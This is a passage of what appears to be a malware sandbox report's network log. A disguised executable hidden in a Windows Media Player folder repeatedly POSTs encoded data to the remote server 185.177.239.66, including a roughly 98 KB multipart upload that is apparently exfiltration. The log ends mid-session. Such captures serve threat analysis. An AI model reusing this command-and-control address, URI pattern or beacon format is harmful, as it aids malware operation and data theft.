                                                                                        Expect: 100-continue
                                                                                        Connection: Keep-Alive
                                                                                        Jan 8, 2025 18:08:47.765068054 CET2596OUTData Raw: 59 59 43 5c 5b 58 52 5f 5e 5c 50 55 50 5a 5a 51 5a 58 5b 5a 54 51 55 51 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
                                                                                        Data Ascii: YYC\[XR_^\PUPZZQZX[ZTQUQTR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P:=W232$$(*=X0=4=;Q)R'1,?<^%/9.Y#,Z!+
                                                                                        Jan 8, 2025 18:08:48.081628084 CET25INHTTP/1.1 100 Continue
                                                                                        Jan 8, 2025 18:08:48.212094069 CET200INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Wed, 08 Jan 2025 17:08:47 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Vary: Accept-Encoding
                                                                                        Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 4=Z@V0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        10192.168.2.450017185.177.239.66808496C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jan 8, 2025 18:08:48.466542959 CET599OUTPOST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
                                                                                        Content-Type: application/octet-stream
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                        Host: 185.177.239.66
                                                                                        Content-Length: 2596
                                                                                        Expect: 100-continue
                                                                                        Connection: Keep-Alive
                                                                                        Jan 8, 2025 18:08:48.812424898 CET2596OUTData Raw: 5c 58 43 5a 5e 59 52 5b 5e 5c 50 55 50 5f 5a 51 5a 5b 5b 5b 54 5c 55 5b 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
                                                                                        Data Ascii: \XCZ^YR[^\PUP_ZQZ[[[T\U[TR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P9]==0!($&(91['-(V)/?U*)0=-8_0?.-.Y#,Z!?
                                                                                        Jan 8, 2025 18:08:49.130783081 CET25INHTTP/1.1 100 Continue
                                                                                        Jan 8, 2025 18:08:49.258784056 CET200INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Wed, 08 Jan 2025 17:08:49 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Vary: Accept-Encoding
                                                                                        Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 4=Z@V0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        11192.168.2.450018185.177.239.66808496C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jan 8, 2025 18:08:49.344053984 CET599OUTPOST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
                                                                                        Content-Type: application/octet-stream
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                        Host: 185.177.239.66
                                                                                        Content-Length: 2084
                                                                                        Expect: 100-continue
                                                                                        Connection: Keep-Alive
                                                                                        Jan 8, 2025 18:08:49.702610970 CET2084OUTData Raw: 59 58 43 5a 5e 5f 52 5d 5e 5c 50 55 50 58 5a 5b 5a 59 5b 5a 54 52 55 58 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
                                                                                        Data Ascii: YXCZ^_R]^\PUPXZ[ZY[ZTRUXTR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P9=1=X$T#'X>9)\'8>8)!':W,?$Y<..Y#,Z!#
                                                                                        Jan 8, 2025 18:08:50.025100946 CET25INHTTP/1.1 100 Continue
                                                                                        Jan 8, 2025 18:08:50.158041000 CET349INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Wed, 08 Jan 2025 17:08:49 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Vary: Accept-Encoding
                                                                                        Data Raw: 39 38 0d 0a 0f 12 3a 06 26 01 36 05 20 28 07 08 2e 2d 24 10 24 06 3a 06 2a 56 2c 01 3e 0a 3c 07 3c 3b 0e 13 3e 28 3d 17 24 02 26 05 21 3c 03 5c 36 3a 2c 5f 02 12 26 45 2b 54 20 56 29 59 38 00 2a 09 25 5a 23 54 29 02 28 20 36 55 23 39 2c 15 25 0d 0c 50 27 31 37 1e 3f 3d 28 05 2e 3d 3e 03 36 03 21 50 0c 12 20 50 35 5e 28 57 22 28 1b 1b 28 38 26 5a 25 25 3e 52 32 29 28 03 23 23 20 0b 25 30 37 0e 31 2b 34 54 24 28 27 10 26 29 3c 53 2d 38 20 53 22 01 2d 53 0e 30 55 51 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 98:&6 (.-$$:*V,><<;>(=$&!<\6:,_&E+T V)Y8*%Z#T)( 6U#9,%P'17?=(.=>6!P P5^(W"((8&Z%%>R2)(## %071+4T$('&)<S-8 S"-S0UQ0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        12192.168.2.450019185.177.239.66808496C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jan 8, 2025 18:08:49.471123934 CET599OUTPOST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
                                                                                        Content-Type: application/octet-stream
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                        Host: 185.177.239.66
                                                                                        Content-Length: 2596
                                                                                        Expect: 100-continue
                                                                                        Connection: Keep-Alive
                                                                                        Jan 8, 2025 18:08:49.827579021 CET2596OUTData Raw: 5c 59 46 5a 5b 54 57 5b 5e 5c 50 55 50 5c 5a 5b 5a 58 5b 58 54 51 55 5d 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
                                                                                        Data Ascii: \YFZ[TW[^\PUP\Z[ZX[XTQU]TR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P9^+!$T+'P#***%.8V=??U>=0*-<Z$<#.=.Y#,Z!3
                                                                                        Jan 8, 2025 18:08:50.163832903 CET25INHTTP/1.1 100 Continue
                                                                                        Jan 8, 2025 18:08:50.298451900 CET200INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Wed, 08 Jan 2025 17:08:50 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Vary: Accept-Encoding
                                                                                        Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 4=Z@V0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        13192.168.2.450020185.177.239.66808496C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jan 8, 2025 18:08:50.482870102 CET575OUTPOST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
                                                                                        Content-Type: application/octet-stream
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                        Host: 185.177.239.66
                                                                                        Content-Length: 2596
                                                                                        Expect: 100-continue
                                                                                        Jan 8, 2025 18:08:50.827677965 CET2596OUTData Raw: 59 5b 43 5a 5b 5e 52 5b 5e 5c 50 55 50 50 5a 59 5a 5d 5b 5b 54 55 55 50 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
                                                                                        Data Ascii: Y[CZ[^R[^\PUPPZYZ][[TUUPTR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P:*2"0"+')_-[$-;)Y )>"R0R.?(_0<;:.Y#,Z!
                                                                                        Jan 8, 2025 18:08:51.157427073 CET25INHTTP/1.1 100 Continue
                                                                                        Jan 8, 2025 18:08:51.287451982 CET200INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Wed, 08 Jan 2025 17:08:51 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Vary: Accept-Encoding
                                                                                        Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 4=Z@V0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        14192.168.2.450021185.177.239.66808496C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jan 8, 2025 18:08:51.016807079 CET644OUTPOST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
                                                                                        Content-Type: multipart/form-data; boundary=----gVbqWoHIFdWLMV08sQ1qNt1HbxRCSaJRob
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                        Host: 185.177.239.66
                                                                                        Content-Length: 98742
                                                                                        Expect: 100-continue
                                                                                        Connection: Keep-Alive
                                                                                        Jan 8, 2025 18:08:51.515413046 CET12360OUTData Raw: 2d 2d 2d 2d 2d 2d 67 56 62 71 57 6f 48 49 46 64 57 4c 4d 56 30 38 73 51 31 71 4e 74 31 48 62 78 52 43 53 61 4a 52 6f 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 30 22
                                                                                        Data Ascii: ------gVbqWoHIFdWLMV08sQ1qNt1HbxRCSaJRobContent-Disposition: form-data; name="0"Content-Type: text/plainY\CR[XRX^\PUP\Z_Z\[TTWU^TR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[
                                                                                        Jan 8, 2025 18:08:51.520623922 CET9888OUTData Raw: 52 7a 5a 5a 32 50 35 36 30 6d 73 37 34 51 6c 44 72 72 63 6b 33 4e 4f 4c 5a 57 67 50 75 7a 39 74 39 4e 6a 6e 51 79 39 61 37 56 39 77 69 36 36 61 68 62 6a 42 59 4f 36 46 50 7a 69 4a 36 58 4f 67 5a 45 41 64 62 46 76 7a 2f 54 52 65 49 33 49 33 50 66
                                                                                        Data Ascii: RzZZ2P560ms74QlDrrck3NOLZWgPuz9t9NjnQy9a7V9wi66ahbjBYO6FPziJ6XOgZEAdbFvz/TReI3I3PfTGps5XU8e72evV3Br92p78BrJCdxbbuyc/D8m75g1ZBF8Yg4K0gHEwiQkQ6hkmoSu3Qz+/QS4JgeLLm9FUzgTK5n4O9gcwARfXTaXKX9AmeUYBuR97K1f5UNj3Yz6NsdzdoxYt87SS6Y9xd+xitE/dDiyP1TY9vZW
                                                                                        Jan 8, 2025 18:08:51.520708084 CET4944OUTData Raw: 58 4c 2f 46 58 68 78 61 56 39 77 64 6e 52 69 5a 49 4c 5a 6e 72 4f 7a 59 61 38 39 48 2f 74 45 32 41 37 48 77 31 4e 4d 4a 6c 4a 42 72 6a 48 66 44 55 72 45 33 51 72 2f 63 63 76 44 44 58 44 7a 38 5a 4b 71 35 66 66 71 6d 30 79 45 68 39 37 61 71 57 59
                                                                                        Data Ascii: XL/FXhxaV9wdnRiZILZnrOzYa89H/tE2A7Hw1NMJlJBrjHfDUrE3Qr/ccvDDXDz8ZKq5ffqm0yEh97aqWYgTVSy7bOnivuyhUCk/tcxrum7OiXCOFIZZwLR85b0HRyvfWbXKtSUa9X+u93j9a3zSMWdvrv+adGXKLf6ySpK05IB+X39wZ6VJeLROSuMz27G45LKctMXJYr/26e8Lz+/wa5KEL/79WRj64+K1L97iY5syXDCVM0G
                                                                                        Jan 8, 2025 18:08:51.520819902 CET9888OUTData Raw: 62 5a 35 47 36 70 42 4c 4b 59 66 31 2b 4c 76 57 41 50 48 50 37 78 36 53 6f 5a 76 6b 75 6a 66 78 39 49 35 64 55 46 35 44 7a 2f 65 52 70 75 63 45 4b 64 49 4b 6e 54 64 58 68 45 50 41 61 51 53 38 66 74 43 53 68 7a 47 37 5a 49 51 4c 72 53 69 2f 53 33
                                                                                        Data Ascii: bZ5G6pBLKYf1+LvWAPHP7x6SoZvkujfx9I5dUF5Dz/eRpucEKdIKnTdXhEPAaQS8ftCShzG7ZIQLrSi/S3L6an+5Uv/7yuzi5vftTbErU5p5qg/cTuBfPTMySH/al3DeZ7dIws9v+J1Pc7wXTcmzoEsrwidHXky6+NyMUZ0qMGB9io2Vufs2ozGp5pWerstxEJbYneYTWtyUKwlsqBEvWuxDCufUdsnlHy+7bHPfvvGXiffQ/Nn
                                                                                        Jan 8, 2025 18:08:51.525897980 CET7416OUTData Raw: 77 6a 59 43 5a 59 70 32 77 34 6f 4d 32 6f 77 71 62 74 79 74 79 68 6b 64 63 45 2f 37 6c 61 6f 47 35 42 34 65 69 64 4a 6e 4b 4c 35 52 62 35 66 53 58 50 2f 36 51 6b 31 31 62 38 62 67 35 39 76 56 67 2b 45 58 72 57 34 2b 71 76 68 39 64 4b 71 4b 33 6a
                                                                                        Data Ascii: wjYCZYp2w4oM2owqbtytyhkdcE/7laoG5B4eidJnKL5Rb5fSXP/6Qk11b8bg59vVg+EXrW4+qvh9dKqK3jud80vvolvpZGz/rn7m9PBcmZ2oige/74jXndEjarSZkuELOJF2rozktfoF925hdVHUZ5P+sUszWrFWU19ODS3KrLgp9gu9flDcNS4cpKJb+fJdTd2berNFvuGVVo80f5bDmLzzXvr1gOQiBkOUmXh8F97BpQQUSkX
                                                                                        Jan 8, 2025 18:08:51.525935888 CET7416OUTData Raw: 51 7a 58 54 69 64 50 78 6b 63 57 44 48 74 53 56 64 6f 5a 6b 72 46 59 32 4e 37 59 77 52 71 70 52 58 43 6c 78 65 63 41 45 48 31 37 64 33 50 33 4b 75 71 41 66 45 4c 4e 73 76 53 36 66 4d 4d 51 64 41 65 76 56 51 75 46 58 35 30 42 6f 63 51 51 2f 70 36
                                                                                        Data Ascii: QzXTidPxkcWDHtSVdoZkrFY2N7YwRqpRXClxecAEH17d3P3KuqAfELNsvS6fMMQdAevVQuFX50BocQQ/p6UrQbzNp1hWdzkTTZBYNmin+Aokw5a1Ne4XCKP25q7jDLd61X8uIhCQZV15aACnCuLzKUWk+3q+T15mRRRXwhp+EmeoORjfuYOBuqRvI6AEMz6Uxe+CT4WXBo/JfhJjXsf3NvPFmk1cdrwsr30+fOuU0fotFKw4Ap4
                                                                                        Jan 8, 2025 18:08:51.525993109 CET4944OUTData Raw: 43 37 65 33 59 4c 73 51 2f 2f 54 55 4a 62 68 74 5a 6f 51 55 4e 66 65 76 54 71 61 6d 61 7a 54 2b 6b 30 73 36 77 41 48 39 46 33 62 76 51 79 79 54 61 36 6b 38 36 79 58 47 4d 68 41 44 4d 44 57 41 35 70 44 64 74 44 54 65 6a 4a 53 53 6f 57 78 6c 64 6c
                                                                                        Data Ascii: C7e3YLsQ//TUJbhtZoQUNfevTqamazT+k0s6wAH9F3bvQyyTa6k86yXGMhADMDWA5pDdtDTejJSSoWxldljC7V1fsSjWfizuruvAj+DN6lCFQ+Qe3+wv9qX5VtKXgpsDqzrNwOl5EaQCX6UsF3NFrgXM80UmiBiToZY9mSeGxPr8mb/GWZMcoXRec1MST+j74owKeBsc9fLXHTT2/WYriS55FTawg870cFuY47AZ4n6/oF35xLQ
                                                                                        Jan 8, 2025 18:08:51.526007891 CET4944OUTData Raw: 33 4a 49 78 47 6d 6e 76 33 6c 72 66 38 61 4d 45 61 59 67 6d 5a 56 33 35 53 4f 37 77 61 50 4d 4f 4b 63 31 37 69 70 58 49 63 74 54 67 4a 42 67 74 66 47 57 79 34 37 30 31 53 58 66 35 6b 30 42 54 6c 6b 75 73 63 6c 65 41 32 74 75 76 4e 37 45 63 42 58
                                                                                        Data Ascii: 3JIxGmnv3lrf8aMEaYgmZV35SO7waPMOKc17ipXIctTgJBgtfGWy4701SXf5k0BTlkuscleA2tuvN7EcBXHK122NpIrzLOSWApgt6MFPSIknr4WVgue2DSszMRGDV7NOzixAeutqokxvulxLPgrW7oXdfYfBuhhILg9tlH7o39k+3JDd2J8S21Wxbec+LOc2X0BK5uL/Me+Uchlx5gGL6FHDtjBPNYhqAqV//UKxjW8h919Y1JC
                                                                                        Jan 8, 2025 18:08:51.526144981 CET4944OUTData Raw: 78 33 37 79 2f 64 73 68 57 56 6a 55 79 78 63 59 75 55 68 41 54 79 51 2b 34 6b 55 35 70 5a 64 41 56 34 59 4a 52 6a 35 32 69 43 73 59 4d 42 33 4f 73 42 34 73 38 43 4f 61 31 37 6a 75 4b 63 45 44 74 49 54 77 51 59 5a 68 36 79 4a 71 2b 4a 53 4e 30 65
                                                                                        Data Ascii: x37y/dshWVjUyxcYuUhATyQ+4kU5pZdAV4YJRj52iCsYMB3OsB4s8COa17juKcEDtITwQYZh6yJq+JSN0evNYlvgQIah6AoIOGF2Xr16jcp1EwisgsfIECbQqrI4sfiy7tQO5x5IMLhydrByVaSgau3LuxvYl09hyivNAia+on/nmfw7C+pNBm7xq20WRNt0RdmePJPL/UVK0SSCUUDSU6MwuOXtnNaT2zano94akXf+CnhFOF1
                                                                                        Jan 8, 2025 18:08:51.526277065 CET14832OUTData Raw: 4e 53 44 36 39 39 69 6b 30 4c 41 7a 39 36 6e 73 61 5a 65 30 44 34 64 46 47 2b 75 47 4a 70 44 54 69 61 50 55 64 4f 39 68 4a 78 71 4d 46 61 33 4b 5a 69 42 43 64 36 4a 74 69 49 61 69 73 4a 2f 79 33 52 2b 58 45 79 64 53 2f 7a 46 47 30 7a 42 75 37 48
                                                                                        Data Ascii: NSD699ik0LAz96nsaZe0D4dFG+uGJpDTiaPUdO9hJxqMFa3KZiBCd6JtiIaisJ/y3R+XEydS/zFG0zBu7HkAS0qjJ62Kio2KP3SAe/OvUIdhoWPSb2+nMQzRzh1MgGAgzLRL8YLTqnY06wwsXxt6YlR0KR0nFGmQep8TmtB8pAO+aKrCCsUnZEQxPDF5M6eYjGGslUmnGyLJKrzJQAUreVTF30IuGke3QNsfEcfFTybAeW8whRS
                                                                                        Jan 8, 2025 18:08:51.706403017 CET25INHTTP/1.1 100 Continue
                                                                                        Jan 8, 2025 18:08:52.537020922 CET200INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Wed, 08 Jan 2025 17:08:52 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Vary: Accept-Encoding
                                                                                        Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 4=Z@V0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        15192.168.2.450022185.177.239.66808496C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jan 8, 2025 18:08:52.448947906 CET575OUTPOST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
                                                                                        Content-Type: application/octet-stream
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                        Host: 185.177.239.66
                                                                                        Content-Length: 2596
                                                                                        Expect: 100-continue
                                                                                        Jan 8, 2025 18:08:52.796385050 CET2596OUTData Raw: 59 58 43 5c 5b 5a 52 5c 5e 5c 50 55 50 5f 5a 5c 5a 53 5b 5e 54 54 55 51 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
                                                                                        Data Ascii: YXC\[ZR\^\PUP_Z\ZS[^TTUQTR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P9>!=01$'&;=)[$?)Y<)-:S0=W.,4_0/(9.Y#,Z!?
                                                                                        Jan 8, 2025 18:08:53.164057016 CET25INHTTP/1.1 100 Continue
                                                                                        Jan 8, 2025 18:08:53.300460100 CET200INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Wed, 08 Jan 2025 17:08:53 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Vary: Accept-Encoding
                                                                                        Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 4=Z@V0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        16192.168.2.450023185.177.239.66808496C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jan 8, 2025 18:08:53.690413952 CET575OUTPOST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
                                                                                        Content-Type: application/octet-stream
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                        Host: 185.177.239.66
                                                                                        Content-Length: 2596
                                                                                        Expect: 100-continue
                                                                                        Jan 8, 2025 18:08:54.416863918 CET25INHTTP/1.1 100 Continue
                                                                                        Jan 8, 2025 18:08:54.803852081 CET2596OUTData Raw: 59 58 43 59 5e 58 52 5c 5e 5c 50 55 50 5b 5a 5f 5a 59 5b 5e 54 50 55 59 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
                                                                                        Data Ascii: YXCY^XR\^\PUP[Z_ZY[^TPUYTR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P9X=W"'?%&$X()"$[8=/7U>%3-*S./%<$:=.Y#,Z!/
                                                                                        Jan 8, 2025 18:08:55.588704109 CET200INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Wed, 08 Jan 2025 17:08:55 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Vary: Accept-Encoding
                                                                                        Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 4=Z@V0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        17192.168.2.450024185.177.239.66808496C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jan 8, 2025 18:08:55.185939074 CET575OUTPOST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
                                                                                        Content-Type: application/octet-stream
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                        Host: 185.177.239.66
                                                                                        Content-Length: 2192
                                                                                        Expect: 100-continue
